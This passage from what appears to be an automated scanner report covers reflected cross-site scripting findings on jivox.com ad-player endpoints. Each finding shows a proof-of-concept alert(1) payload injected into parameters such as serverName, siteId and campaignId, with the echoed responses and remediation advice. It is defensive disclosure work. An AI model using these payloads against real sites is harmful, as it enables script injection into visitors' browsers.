Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:41 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=140ae9"-alert(1)-"bfa34e952f0&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&jvx
...[SNIP]...

4.86. http://as.jivox.com/player/jivox_ad_tags.php [serverName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the serverName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4197e"%3balert(1)//3bc496d4453 was submitted in the serverName parameter. This input was echoed as 4197e";alert(1)//3bc496d4453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The excerpt below shows serverName reflected twice with different decoding: URL-decoded inside setServerURL("...") (the %3b has become a semicolon) and still percent-encoded inside the flash-variables string. Each reflection point needs its own encoding pass, and because the value is a URL it should first be validated against an origin allowlist.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com4197e"%3balert(1)//3bc496d4453&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:52 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57690
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
f(jivoxAdPlayer) != "undefined"){
var jvxAdPlayer = new jivoxAdPlayer();
jvxAdPlayer.setPlayerWidth(300);
jvxAdPlayer.setPlayerHeight(250);
jvxAdPlayer.setServerURL("http://as.jivox.com4197e";alert(1)//3bc496d4453");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com4197e"%3balert(1)//3bc496d4453&iframeTag=on&siteId=24bbcd13d37379&ca
...[SNIP]...

4.87. http://as.jivox.com/player/jivox_ad_tags.php [serverURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the serverURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e52"-alert(1)-"5fe4b721423 was submitted in the serverURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The 4.79 response also shows a serverURL variable used as the prefix of a dynamically created script element's src, so if that variable is the one set here, string encoding is not a sufficient fix on its own: a quote-free value pointing at an attacker's host would make the player load attacker-controlled script without any injection. Restrict the value to an allowlist of origins as well.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com91e52"-alert(1)-"5fe4b721423&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:50 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com91e52"-alert(1)-"5fe4b721423&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&jvxSessionId=1307963030.4011");
jvxAdPlayer.setP
...[SNIP]...

4.88. http://as.jivox.com/player/jivox_ad_tags.php [siteId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the siteId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93237"-alert(1)-"1c0ac26dc9c was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be emitted into script, write it as a JavaScript string literal with quotes, backslashes, line terminators and the characters <, > and & escaped (in PHP 5.3 or later, json_encode() with JSON_HEX_TAG|JSON_HEX_AMP|JSON_HEX_APOS|JSON_HEX_QUOT), rather than concatenating the raw value into a quoted string as setFlashVariables("...") does here. siteId is an opaque hexadecimal identifier and can additionally be validated against ^[0-9a-f]+$ before use. Note also that jivox_ad_tags.php returns JavaScript with Content-Type: text/html; it should be served as application/javascript with X-Content-Type-Options: nosniff, so that the same URL is not rendered as an HTML document when opened directly.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d3737993237"-alert(1)-"1c0ac26dc9c&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:01 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
setServerURL("http://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d3737993237"-alert(1)-"1c0ac26dc9c&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1
...[SNIP]...

4.89. http://as.jivox.com/player/jivox_ad_tags.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9e87"-alert(1)-"50c9a07e8ac was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. t is a millisecond timestamp (1307962892856 in this request) and should be validated as an integer and rejected otherwise; if it is still emitted into the setFlashVariables("...") string, it must be JavaScript-string-encoded rather than concatenated raw.

Request

GET /player/jivox_ad_tags.php?t=1307962892856d9e87"-alert(1)-"50c9a07e8ac&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:29 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
w jivoxAdPlayer();
jvxAdPlayer.setPlayerWidth(300);
jvxAdPlayer.setPlayerHeight(250);
jvxAdPlayer.setServerURL("http://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856d9e87"-alert(1)-"50c9a07e8ac&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLj
...[SNIP]...

4.90. http://as.jivox.com/player/jivox_ad_tags.php [volume parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the volume request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87dc8"-alert(1)-"89cb3bf5b3e was submitted in the volume parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. volume is a number (0 in this request) and should be validated as one before it is emitted; a value that is not numeric has no legitimate use and can be rejected outright.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=087dc8"-alert(1)-"89cb3bf5b3e&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:33 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
QkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=087dc8"-alert(1)-"89cb3bf5b3e&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-
...[SNIP]...

4.91. http://as.jivox.com/player/jivox_ad_tags.php [volumeInitAction parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the volumeInitAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 705a7"-alert(1)-"a39bde29291 was submitted in the volumeInitAction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. volumeInitAction takes a small set of keywords (toggleMute in this request) and should be checked against that allow-list on the server; anything outside it should be replaced by the default, not echoed.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute705a7"-alert(1)-"a39bde29291&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:37 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
lieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute705a7"-alert(1)-"a39bde29291&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.j
...[SNIP]...

4.92. http://as.jivox.com/unit/jivox_unit_tags.php [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f8fd'%3balert(1)//af89749ee75 was submitted in the campaignId parameter. This input was echoed as 1f8fd';alert(1)//af89749ee75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. campaignId is an integer (19628 here) and should be validated as one before it is placed into the proxy.php URL that the script builds; any value that survives to output should be JavaScript-string-encoded (in PHP 5.3 or later, json_encode() with the JSON_HEX_* flags) rather than concatenated into a single-quoted literal. jivox_unit_tags.php likewise returns JavaScript with Content-Type: text/html and should be served as application/javascript with X-Content-Type-Options: nosniff.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=196281f8fd'%3balert(1)//af89749ee75&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:31 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32442


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
